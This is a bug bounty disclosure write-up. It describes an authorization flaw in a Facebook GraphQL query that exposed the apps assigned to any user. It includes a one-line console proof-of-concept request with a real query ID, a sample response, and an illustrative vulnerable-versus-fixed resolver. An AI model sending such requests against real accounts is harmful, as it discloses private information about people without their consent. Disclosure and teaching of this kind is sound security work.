
Disclose assigned apps of any Facebook user

1 min read, Feb 22, 2024

There is a GraphQL query named AccountQualityDataSourceCardWrapperRootQuery that fetches the data sources (assigned assets such as apps) of a Facebook business account, taking the value of "assetOwnerId" as the business account ID. At the time of reporting, the query enforced authorization when assetOwnerId was a business account ID, but not when it was a user ID: the same query accepted any user ID as the asset owner without checking whether the caller was allowed to view that user's assets.

Given only the target user's ID as input, it was therefore possible to disclose all the data sources assigned to that user, a classic insecure direct object reference (IDOR) on an object-level authorization check.
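To make the authorization gap concrete, here is an added example that is not code from the original post or from Facebook: a toy resolver in Node.js that behaves the way the write-up describes (the check runs only on the business-account branch, so a user ID slips through), next to a fixed version that authorizes every owner type before returning anything. All IDs, owner records, the ACL and the helper names (canView, probe, resolveDataSourcesVulnerable, resolveDataSourcesFixed) are constructed for illustration; the real server-side resolver is not public.

```javascript
// Added example, not the original post's or Facebook's code. Models the
// authorization bug described above with constructed data.

// Constructed sample data: which data sources belong to which owner id.
const DATA_SOURCES = {
  "100000000000001": [{ data_source_id: "111", data_source_name: "Shop App",
                        asset_type: "APP", is_unavailable: false, violations: [] }],
  "200000000000002": [{ data_source_id: "222", data_source_name: "Biz App",
                        asset_type: "APP", is_unavailable: false, violations: [] }],
};
// Constructed owner types: a personal user account vs. a business account.
const OWNER_TYPE = { "100000000000001": "USER", "200000000000002": "BUSINESS" };
// Constructed ACL: viewer id -> set of owner ids whose assets the viewer may read.
const ACL = {
  "100000000000001": new Set(["100000000000001", "200000000000002"]), // Alice: self + her business
  "300000000000003": new Set(["300000000000003"]),                    // Mallory: only herself
};

class AuthorizationError extends Error {}

// Assumed authorization primitive: may `viewerId` read assets owned by `ownerId`?
function canView(viewerId, ownerId) {
  const allowed = ACL[viewerId];
  return allowed !== undefined && allowed.has(ownerId);
}

// Vulnerable resolver: the check is attached to the BUSINESS branch only, so a
// USER owner id is returned to any logged-in viewer, which is the reported bug.
function resolveDataSourcesVulnerable(viewer, args) {
  const ownerId = String(args.assetOwnerId);
  if (OWNER_TYPE[ownerId] === "BUSINESS" && !canView(viewer.id, ownerId)) {
    throw new AuthorizationError("not permitted");
  }
  return DATA_SOURCES[ownerId] ?? [];
}

// Fixed resolver: authorize the (viewer, owner) pair before any branching on
// owner type, so every owner kind is covered and unknown ids look the same as
// forbidden ones (no existence oracle).
function resolveDataSourcesFixed(viewer, args) {
  const ownerId = String(args.assetOwnerId);
  if (!canView(viewer.id, ownerId)) {
    throw new AuthorizationError("not permitted");
  }
  return DATA_SOURCES[ownerId] ?? [];
}

// Mirrors the PoC: run the query as `viewerId` against `assetOwnerId` and
// report whether the owner's data sources were disclosed.
function probe(resolver, viewerId, assetOwnerId) {
  try {
    const dataSources = resolver({ id: viewerId }, { assetOwnerId });
    return { leaked: dataSources.length > 0, data: { dataSources } };
  } catch (e) {
    if (e instanceof AuthorizationError) return { leaked: false, error: e.message };
    throw e;
  }
}

const MALLORY = "300000000000003";
const ALICE_USER = "100000000000001";
const ALICE_BIZ = "200000000000002";

// Mallory queries Alice's user id, as in the write-up: leaks against the
// vulnerable resolver, is refused by the fixed one.
console.log("vulnerable:", JSON.stringify(probe(resolveDataSourcesVulnerable, MALLORY, ALICE_USER)));
console.log("fixed:     ", JSON.stringify(probe(resolveDataSourcesFixed, MALLORY, ALICE_USER)));
```

The practical check this encodes: for any endpoint that accepts an owner or account ID, test it with an ID of each type the endpoint can resolve (user, page, business, app) while authenticated as an unrelated account, because authorization that is bolted onto one type branch rather than applied to the resolved object is exactly what leaves the other branches open.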


Proof of concept

Send the GraphQL request as an AJAX call from the browser's JavaScript console while on facebook.com (AsyncRequest is Facebook's own client-side request helper, so the call is sent with your logged-in session). Replace FBID with the numeric ID of the targeted user.

AccountQualityDataSourceCardWrapperRootQuery:

new AsyncRequest('api/graphql/').setData({doc_id:8009820932425164,variables:'{"assetOwnerId":"FBID"}'}).send()

Response (AppID and App_Name stand in for the disclosed values):

{"data":{"dataSources":[{"data_source_id":"AppID","data_source_name":"App_Name","asset_type":"APP","is_unavailable":false,"violations":[]}]},"extensions":{"is_final":true}}

Impact

This could have let a malicious user disclose all the apps (data sources) assigned to any Facebook user, knowing nothing more than that user's numeric ID.

Timeline

  • 18 Jan, 2023 — Report sent to Facebook.
  • 19 Jan, 2023 — Triaged.
  • 3 Feb, 2023 — Marked as duplicate.

Thanks for reading my write-up 🤗 Happy Hacking 🎭️

Thanks & best regards,
Gtm Mänôz

Linkedin: https://linkedin.com/in/gtm0x01

Twitter: https://www.twitter.com/gtm0x01/

Facebook: https://www.facebook.com/gtm0x01

Instagram: https://www.instagram.com/gtm0x01/
